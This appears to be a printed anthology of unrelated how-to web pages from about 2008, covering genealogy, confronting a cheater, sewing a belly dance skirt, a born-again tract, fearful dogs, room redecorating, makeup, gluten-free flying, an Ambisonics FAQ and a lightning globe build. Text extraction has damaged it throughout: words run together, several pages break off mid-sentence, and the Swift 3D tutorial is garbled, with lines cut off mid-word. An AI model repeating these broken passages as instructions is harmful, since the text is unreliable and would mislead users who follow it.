Visit libraries, especially in areas your family lived in.Libraries have many resources such as school yearbooks, cemetery records, and other family histories that may include your ancestors. Ask the librarian if they have a genealogist on staff that could help you locate records. Some libraries specialize in

genealogy, so make a few calls to find one nearest you for searching census or newspaper records. (See Step 6 if you're really serious.)

Visit government buildings that house records in areas yourfamily lived in. Get copies of records, such as birth certificates, marriage licenses, death certificates. These often have maidennames, parents' names and other information that you may be looking for or need to verify.

Go online. There are a number of free family search sites,like Rootsweb, where you can search other family trees to find others who are researching your family. There are passenger lists you can find. Even simply searching for a person's name often reveals sources of information.

Subscribe to online search sites. To go even furtheryou can subscribe to a site like Ancestry where you have access to thousands of records, including census and military records. These are easily searchable and will save you a lot of time if you're

serious about your search. If going this route, make it Step 3, using Steps 3 through 5 above to enhance this step.

Easy Family Tree ChartsCreate Your Own Family Tree See Examples. Free Download!www.SmartDraw.com

Free Family Tree ProgramCreate and Print Your Family Tree Easy and Free!www.myheritage.com

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How to Avoid Common Mistakes when Confronting a Cheater - wikiHow http://www.wikihow.com/Avoid-Common-Mistakes-when-Confrontin...

1 2 19/4/2008 2:52




How to Avoid Common Mistakes when Confronting aCheaterTired of being beaten by a cheater? You've come to the right place.

StepsLook them in the eye. Cheaters have some guilt in them, even if they're good at hiding it. Make it seem as though you seeright through them, you're onto their little scheme, and that they shouldn't mess with you.


Tell another person, but NOT teacher, as if they're already a cheater, they might try to retaliate with peers! Try flipping thetables. Get another peer, who's a friend or decent enough, to witness or expose the dirty cheater! It'll make them start toget nervous, and from there you can start to interrogate them until the truth slips out!


If they're a cheater expert, they might be aware of this "I'm onto you" stare. But they can't read minds. Do it perhaps assneaky as they are--or when they least expect it. Who knows? They might learn a lesson if you're patient and nice enoughwhen you confront them!


Explain why cheating is bad, but not the normal way "it's the wrong thing to do" or they'll tune you out. Explain howcheating once got you into trouble, or an experience of yours or another's of how cheating affected yours or their life.They'll feel awful and at least listen to what you have to say.


You need to be prepared, if you have an idea about how this person will react, prepare for it and have your comebackready, it's best not to just run out and say things in the heat of your anger and frustration. Take a minute, or even a day tocalm down and think about the entire situation, try writing down your feelings so it's easier to decipher all of the thingsyou're feeling.


If this person is intimidating to you don't confront him/her alone. Bring a friend with you, your dog, do it in a crowded area,or ANYTHING you can use to your advantage!


TipsPractice your "I'm onto you" stare. Make it look convincing, threatening, and head-on confident and bold. Otherwise, if youlook unsure or meek, they'll write you off as someone who isn't confrontational.

If you're insecure, struggle with confidence or standing up for yourself, take an Assertive class.

If all else fails, alert the teacher or person of authority or power. Desperate circumstances call for desperate measures.

WarningsDon't be mean or try to cheat yourself!

Be aware of their shoes--how afraid would you feel if someone approached you to confront you for cheating? Probablycautious or nervous, if you did cheat, and even if you didn't. Please try to be kind, patient, and gentle--they'll be more likelyto listen.

Don't stoop to their level. What works for one person, such as stealing, might not work for you if you think stealing ishorrible. Because if you think another person is being awful by doing one thing, you'll feel twice as worse doing it yourself.Get it?

Be PATIENT and GENTLE--don't jump to blowing your head off or screaming to the top of your lungs. Be respectful andgentle, try to understand and convince them, and listen and expect them to do the same! The rest should fall into placeafter that.

Any decent person would listen and stop if you were patient, gentle, and communicated respectfully. If they fail to do so,

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How to Make a Full Belly Dance Skirt - wikiHow http://www.wikihow.com/Make-a-Full-Belly-Dance-Skirt

1 4 19/4/2008 2:50


How to Make a Full Belly Dance Skirt

These are instructions for making one of those endless dreamy skirts that no matter how much you pull, tuck, turn, or whip‘em there’s still plenty left. Made from 5 seamless half circles, it gives you much more to dance with than a plain old circleskirt. This is an amazingly simple full circle-circle-circ (that's two full circles and a half!) skirt for belly dancing. For sheer fabric,it’s a way to give you more coverage without layers. Worn underneath, these skirts can compliment a skimpy skirt thatsometimes comes attached to a belly dance belt.

StepsSelect your fabric. For instructional purposes 5 different color panels, 2.75 yards

(2.5m) each, were used. You will probably want one solid color. This fabric had some gold sari-like brocade trim on it,which for the most part will not be a part of the main skirt. With the leftover fabric, you will be able to make a petal-likeover-skirt. You will need approximately 12 to 14 yards (11-13m) of 45” (1.14m) wide fabric (see Tips about costs). If youare very tall and your favorite skirt is 42” (1m) or longer, you may need to buy 60” (1.5m) wide fabric not 45". Polyesterchiffon is the popular choice. It comes in a variety of colors, you can wash it, and it doesn’t wrinkle like silk. Silk chiffonworks as well and it is great for stage when accompanied by a large silk veil. For a tribal style, plain old black cottonsheeting can be used, but you must add extra inches to each panel, since cotton doesn't roll like chiffon, and you mustmake a folded hem.


Cut the panels.Measure around your hips (C) and the length (L) of your favorite belly dance skirt. Calculate your hip diameter (D) bydividing your hip measurement (C) by 3.14. Use this formula to calculate how much fabric you need for each panel: (2 x L)+ D = one panel, add 2-3 inches (5-7.5 cm) to each panel for seam allowance at hips and a rolled hem (or add 5-6" (12-15cm) for cotton/folded hems). If you can, let them cut the fabric into panels for you at the store. The length of each panel ismost important. Be generous and round up. Skimping on fabric does not make a less full skirt, it makes an uneven hemwith shortness at the seams. Add some extra to the last panel for two waist-bands.


Fold each panel in half. Calculate the hip portion you will cut from each panel by3.

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Cut a portion of your hip circumference from each panel

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**********************HOW TO BE BORN AGAIN**********************

Some people say: “Why all this fuss about being born again? Whyare so many talking about it?”

Nicodemus, who was a ‘ruler of the Jews’ during Christ’sday, came to Jesus asking for an advice. Jesus’ simple answer:

“Except a man be born again, he cannot see the kingdom of God.”(John 3:3)

Some today, like Nicodemus, will ask, “How can a man be bornagain when he is old? Can he enter the second time into hismother’s womb and be born?” (John 3:4)

But Jesus answers, “That which is born of flesh is flesh,and that which is born of the Spirit is spirit,” statingagain that one must experience a spiritual rebirth in order to enter heaven - “YE MUST BE BORN AGAIN.”

-A VERY PERSONAL QUESTION-Have you been born again? have you experienced this spiritual rebirth? This is the one thing, according to the Word of God, that will determine your eternal destiny.

For those who really want to know how to be born again, here is the answer from God’s inerrant Word: THE BIBLE. We must RECOGNIZE that FACT that we are sinners, that wehave violated God’s laws (and we ALL have).


We must REPENT of our sins. The Bible says: God sommandeth all men everywhere to repent.” (Acts 17:30)

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How To Help Your Shy or Fearful Dog | How To Do Things.com http://www.howtodothings.com/pets-animals/how-to-help-your-shy-or...

1 2 13/4/2008 10:19




By Nicole Wilde


How To Help Your Shy or Fearful DogSafe, Easy Steps to Ease Your Dog's Stress

Dogs can be shy or fearful for many reasons, including genetics, lack of early socialization, and

traumatic experience. Regardless of the cause, there are things you can do to help.

Take it in slow, gradual steps. One of the best ways to help a dog who is afraid of a specific

thing -- whether it’s other dogs, strangers, or your vacuum cleaner -- is to use desensitization.

That means exposing your dog to the thing that frightens him in a systematic, gradual way. For

example, if your dog were afraid of the sound of the vacuum cleaner, you could start by turning

the vacuum on when your dog was in the other room. Once he was comfortable at that distance,

you could turn it on when he was just outside the room. Eventually you would work up to his

being comfortable with the sound up close. By using desensitization, your dog would learn at his

own pace that the big, scary thing really isn’t so bad. Never use “flooding,” which means forcing

your dog to confront the thing that frightens him. Flooding can be traumatic to your dog, make

the problem much worse, and create trust issues between you.


Use classical conditioning. In other words, pair the scary thing with something your dog really

likes. Let’s say your dog is afraid of other dogs. Start at a distance at which your dog is

comfortable, whether it’s ten feet from passing dogs, or fifty. Every time another dog appears,

start feeding your dog treats. Keep feeding them rapidly, one after another. If you’d like, you can

also chat cheerfully to your dog at the same time. But once the other dog is gone, the treats and

chatting should stop immediately. By teaching your dog that good things happen when other dogs

appear and stop when they’re gone, a change will eventually occur in your dog’s emotional

response. It will no longer be, “Oh no, another dog, run away!” but rather, “Oh good, another

dog, where’s my treat?”


Never push your dog over threshold. In the best of all worlds, when working on a behavior

modification program, your dog would never feel so uncomfortable that he would run away, bark,

or show any reaction that signals fear. To help accomplish this, learn to read your dog’s body

language. Dogs give subtle signals when they are afraid. We all know about flattened ears and a

tucked tail, but yawning, licking the lips, a tense and stiff body, scratching, and sniffing the

ground are also signs that your dog may be nervous. (Look around the vet’s waiting room the

next time you’re there -- you’re likely to notice many of these signals.) If you are working with

your dog and see any of these signs, back off to a distance that does not trigger your dog’s

reaction. In the event that your dog does react, leave the area as calmly as possible and start at a

greater distance the next time.


In some cases, habituation can help. If your dog is simply shy, or hasn’t spent much time

around other dogs or people, take your dog with you everywhere you can. This should only be

done if your dog’s level of stress if mild. Your dog will eventually habituate -- get used to -- being

around people and dogs.


Teach people to use non-threatening body language. If your dog is shy of people, allow her

to approach them in her own time instead of the other way around. A person walking toward your

dog and leaning over her can be frightening! Petting is another consideration. Most people want to

pet a dog palm-down over the dog’s head, which can be scary for the dog. Once your dog has

approached someone, ask the person to pet your dog on the chest or side of the face, without

staring at her or leaning over her. The person can even turn their body to the side. This body

language will make your dog more comfortable.



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How to Convince Your Parents to Let You Redecorate Your Room - w... http://www.wikihow.com/Convince-Your-Parents-to-Let-You-Redeco...

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How to Convince Your Parents to Let You RedecorateYour Room

So your room looks like it was decorated for a toddler, and it's getting really boring, but your parents still think it's so adorable,cute, and all that jazz? Here is how to convince your parents that your room is in dire need of a professional interior decorator.

StepsBe sure that this is your personal room for keeps and that you are never going to change rooms. Talk to your parentsabout why you want to decorate your room (be sure to have about three good reasons).


Go out and get graph paper and measure the entire outline of your room, set up the paper in the shape and measurementof your room (scaled down) also measure the must-keep furniture the same way.


Go out and get paint chips, fabric samples, that kind of stuff, get business cards of people you will need to help you lateron. If you can, find one of those softwares that allow you to make a 3D version of any room, and do it the way you wouldlike.


Bring all your supplies to your parents and do a presentation. If you get into an argument, be fair and nice and try tounderstand it from their point of view.


Make sure to offer to pay part of the budget.5.

TipsAllow anyone who wants to help to go shopping with you.

Ask your parent or guardian if they want to help. It might make them more receptive if they know you won't do anythingoutrageous.

WarningsBe prepared to get shut down. Maybe there isn't enough money or time. Accept this and move on.

Avoid taking advantage of your parents when decorating your room.

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Swift 3D Tutorial - Advanced Modeler Guide Part 3: Smoothing Groups http://www.genericwebaddress.com/articles-swift-3d/advanced-modele...

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Swift 3D Tutorial – Advanced ModSmoothing Groups

IntroductionDuring the Advanced Modeler interface and tools tutorial in Part 1, there were two Groups and Smoothing Groups. In Part 2, we explored Surface Groups in depthAdvanced Modeler.

Here in Part 3, we are going to explore Smoothing Groups in depth, and learn hoprojects.

Smoothing Groups: DefinitionSmoothing groups are similar to Surface Groups in that they define render settingsdifference is that while a Surface Group defines a material or texture, a Smoothingshaded evenly, with no discernable border between adjacent faces.

Smoothing Groups, used in conjunction with some of the other subdivision smoothcan produce effects that are similar to - though much less powerful than - the Hypehigh-end 3D applications.

How to Access Smoothing GroupsIf you still have your practice file from Part 2, with the box mesh that we divided intopen. Otherwise, head into the Advanced Modeler and create a box mesh in the P

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How To Do Your Makeup Like A PRO! | eHow.com http://www.ehow.com/how_2142925_do-makeup-like-pro.html

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How to Do Your Makeup Like A PRO!By CCrock

Rate: (25 Ratings)

Appreciate your own beauty and unique features with simple makeup and skincare. Professional and renowned make-up artist Bobbi Brown says Beautyshould be REAL and APPROACHABLE. Find make-up tips here whether it'sday to day or a night on the town.

Things You’ll Need:

Good Brush setConcealer, foundation and powderTimeless color palets for eyes and cheeksBlack MasacaraTweezers

Step 1:Shape up your brows and clean up stray hairs so your makeup will go onsmoothly and look clean.

Step 2:Invest in a good set of make-up brushes. Look for ones made ofsable and are hand trimmed. They may be a little pricey up front,but if you take care of them, they will last for YEARS!

Step 3:Find the right concealer and foundation for your skin tone. Go to the beautycounter where you can sample various shades and have help finding the right one for you. *Yellow based foundations complement skin rather than give anunnatural pink look.

Step 4:The key to looking beautiful and polished is having a great canvas. What Imean by that is, the most important part of your make-up application is eveningout your skin-tone and making your complexion look as good as possible.

Step 5:Moisturize your face and use an creamy eye moisturizer. LetMoisturizer set in for a moment.

Step 6:Using a concealer brush, apply the concealer starting at theinner corners of eyes and working out along the bottom of the lash line, corners of nose and to an blemished/discolored areas.Using your ring finger, gently blend the concealer into your skin by tapping and gently . a second concealer with a peach tonemay need to be applied if the skin around your eyes is really dark

and greenish.

Step 7:Now using a small blender brush, set the concealer with a matching loosepowder. Try a creamy concealer kit that matches concealer powder toconcealer cream like the one made by Bobbi Brown.

Step 8:Next, Start your eye make-up. Choose a silky, matte formula toapply to your lids and use for defining brow bone. A matte whiteor Bone color works as a good base that can be used all over.Using an eye shader brush, tap your base color all over your eyelid.

Step 9:Select your color of a shimmer shadow, a warm peach or pink ifyou like. Using the eye shadow brush, gently tap the shadowonto your lids.

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PHJ specifies how W, X, Y and Z can be encoded into four channels, called Left, Right, T and Q, and is the"no-compromise" periphonic C-Format. Periphonic (full-sphere) reproduction requires speakers to be placedabove and below the height of the listeners' ears.

BHJ, SHJ, THJ and PHJ are all inter-compatible. That is to say, to go from one member of the set to the next youadd or delete additional signals without changing those that remain. A beauty of this is that each member of theUHJ set is mono and stereo compatible. In addition, a BHJ decoder, for example, can decode SHJ, THJ and PHJmaterial simply by ignoring the extra T and Q channels.

Version 1.0 of this FAQ suggested encoding a third channel into the subcodes of a CD to give THJ or SHJ. Ittranspires that the bandwidth available in the subcodes is less than 2 kHz using 16 bits, so this ain't gonna fly.

It is possible, however, to use "buried data" to encode a third channel of reduced bandwidth onto a CD such thatan existing CD player is unaware the channel exists. This would allow SHJ encoded CDs to be produced that arecompletely compatible with conventional stereo CD players. That is to say, a stereo system would producestereo, a BHJ decoder would produce surround sound, and an SHJ decoder (fed from a CD player with specialdigital electronics) would produce even better surround sound. All this from the same CD! The technique is too complicated to describe here, and interested readers should consult the Gerzon and Craven 1995 reference.

Peter Knight has pointed out that the CD format specification includes a four-channel quad format that would besuitable for PHJ encoded material. The problem, of course, is that existing CD players are not quad CD "aware"and would produce a mishmash if asked to play a quad CD. He has also pointed out that quad CDs have to bespun twice as fast as stereo CDs and have only half the playtime.

Go back to the Contents list.

9. Are UHJ encoded CDs available?


A discography of 160 or so UHJ encoded record releases is available on the Surround Sound Discography HomePage. I am also happy to e-mail copies to people. The discography was originally compiled by Eero Aro and isbeing maintained by Mark Anderson.

It is not complete and updates are requested; details on how to do this are given at the beginning of thediscography. Omissions include about 450 recordings from Nimbus Records. (All recordings from NimbusRecords are UHJ encoded.)

Go back to the Contents list.

10. What happens with stereo sources (conventional LPs, CDs, etc)?

Domestic Ambisonic decoders feature a Super Stereo button for decoding stereo sources. This uses the rear partof the sound field to reinforce the location of sounds in front of the listener. In addition, any ambience present inthe source will be directed all around the listener, although the effectiveness of this depends greatly on therecording technique that was used. The Super Stereo mode also includes a stereo width control which allows thestereo image to be compressed to mono-like or expanded into a horseshoe around the listener.

Go back to the Contents list.

11. How does Ambisonics differ from quadraphonics?

Quadraphonics was a collection of incompatible systems introduced in the 1970s. The collection included SQ,QS, UMX and CD-4. As the name suggests they assumed four channels feeding four speakers, and usuallyassumed that the speakers would be 90 degrees apart. (Compare this with the 60 degrees between speakers in

Page 231: The Instructional Capital volume I


Gluten-Free on Planes - Gluten Free in Airports - Gluten-Free Airplan... http://celiacdisease.about.com/od/theceliactraveler/a/AirplaneMeals.htm

1 2 19/4/2008 3:11

With a few minutes' preparation, you'll enjoy gluten-free snacks while your fellow travelers survive on skimpy

bags of junk food.Nancy Lapid

Celiac Disease

Gluten-Free Airplane TravelFrom Nancy Lapid,Your Guide to Celiac Disease.FREE Newsletter. Sign Up Now!About.com Health's Disease and Condition content is reviewed by the Medical Review Board

Gluten-free travelers cannot eat regular airline meals, so some advance food preparation is required before traveling on planes.

Gluten-Free Airline Meals

Many airlines offer special gluten-free meals (abbreviated in the airline food world asGFML). Especially if you are going on a long flight, it is worthwhile to choose one ofthese carriers. Some airlines only offer special meals on long-haul or cross-continentalflights, so just because you had gluten-free meals on a flight from New York toLondon, for example, don’t assume the same airline will give you a gluten-free mealon your flight from New York to Dallas.

Reserve your gluten-free meal in advance. You cannot ask for the special meal at the last minute. You must request it anywhere from 24 to 96 hours before your flight.

(Consequently, if you change your flight home at the last minute, you'll lose your gluten-free meal.) If I’ve made myreservation far in advance, I usually call back a few days before the flight to confirm that they’re preparing agluten-free meal for me.

After you’ve boarded the plane, the flight crew will come to look for you to tell you they’ve got a special meal onboard for you. If you’ve changed your seat at the last minute, they might look for you at your “old” seat, so let themknow where you are.

Don't assume you can eat everything on the tray. The special meal will be wrapped and sealed; all the flight crewneeds to do is warm it up and place it on your tray. You can safely eat whatever is sealed inside the package. Theflight crew, however, cannot be expected to know the dietary guidelines of every disease for which special medicalmeals are provided. They may "generously" add the regular dessert to your tray, or a roll, or some other unsafe fooditem. Don’t assume that everything on your tray is gluten-free. Safe items will be sealed and labeled, and you’ll beunwrapping these by yourself. Everything else is questionable and you’ll need to read labels and use commonsense.

Always bring along emergency food supplies. Unfortunately, despite the airline’s best efforts to provide a specialgluten-free meal for you, things can still go wrong. If your flight is canceled and you’re placed on a different flight, orif something is wrong with your original aircraft and they switch your plane at the last minute (after the food servicehas already loaded the meals onto the original plane), your gluten-free meal is not going to follow you to the “new”plane. No matter how far in advance you planned and how many times you double-checked, there’s always a solidrisk that you’ll end up on a plane without anything to eat… unless you’ve brought along some emergency foodsupplies. Never travel by plane without bringing some food along for yourself.

Bring-Your-Own Airline Meals

Many years ago I read a suggestion that celiacs carry with them a letter from their doctor explaining their need tobring their own food along. I’ve carried such a letter and never had to use it, but it can’t hurt to have one in yourpurse or briefcase. Even with the new regulations limiting the amount of fluids you can bring past airport security,I’ve had no problems bringing food along for myself, even for flights as long as 12 or 13 hours.

Get yourself one of those soft-sided insulated lunch packs and a couple of reusable ice packs (the kind soldin drugstores for use on bruises), especially if you’re going on a long flight. You can put it inside one of your othercarry-on bags if necessary. Before your flight home, chill the ice packs again in your hotel’s ice bucket, or ask thehotel to freeze them for you in their freezer.

Place everything in zip-lock bags, because cabin pressure changes can cause even well sealed items to leak. (Get as much air out as possible before zipping them closed.) The same guideline is true for any food you pack in your checked baggage.

Make your own Lightning Globe!: Fit the screen over the bulb - Instru... http://www.instructables.com/id/SQZRC40F7DWO01E/

1 2 9/4/2008 12:38

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Make your own Lightning Globe!by NK5 on Oct 5, 2007 in TECH & OFFBEAT email it!

step 3 Fit the screen over the bulbNext, I trimmed the screen on the top and bottom to be sure the high voltage wouldn't arc unintentionally.

Then I made several cuts evenly spaced around the screen so I could fold it to the shape of the globe.

To make it easier, you can make one cut the proper length, remove the bulb, then make the rest of the cuts. At that point, simply bend the screen flaps down and then slide the bulb inside. That will make it nice and tight.

Do the same for the top, and then use your hands to gently squeeze the screen around the globe so it's form-fitted.

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views: 49.552

category: tech & offbeat

keywords: Lighning, Globe, Bulb, Plasma, high, voltage, monitor, hack

license: Attribution-NonCommercial-ShareAlike

author: NK5

published: Oct 5, 2007

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The Instructional Capital

Volume I